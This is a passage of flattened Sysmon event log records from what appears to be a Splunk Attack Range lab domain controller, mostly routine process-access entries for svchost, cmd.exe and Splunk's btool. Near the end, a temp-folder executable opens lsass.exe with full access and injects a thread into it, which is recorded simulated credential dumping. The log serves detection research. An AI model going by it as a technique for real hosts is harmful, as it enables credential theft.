Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000005304Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDB-5FA1-1601-000000008801}2588C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005303Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005302Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005301Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005300Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005299Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005298Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005297Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005296Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005295Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005294Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDB-5FA1-1601-000000008801}2588C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005293Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7CDB-5FA1-1501-000000008801}32444480C:\Windows\system32\cmd.exe{D28789B6-7CDB-5FA1-1601-000000008801}2588C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005292Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.011{D28789B6-7CDB-5FA1-1601-000000008801}2588C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CDB-5FA1-1501-000000008801}3244C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000005291Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDB-5FA1-1501-000000008801}3244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005290Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005289Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005288Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005287Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005286Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005285Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005284Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005283Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005282Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005281Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CDB-5FA1-1501-000000008801}3244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005280Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7CDA-5FA1-1401-000000008801}39961356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CDB-5FA1-1501-000000008801}3244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005279Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.007{D28789B6-7CDB-5FA1-1501-000000008801}3244C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-1401-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 824800x80000000000000005278Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe41000x00000161B50D082C-- 10341000x80000000000000005277Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005276Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-1401-000000008801}3996C:\Program 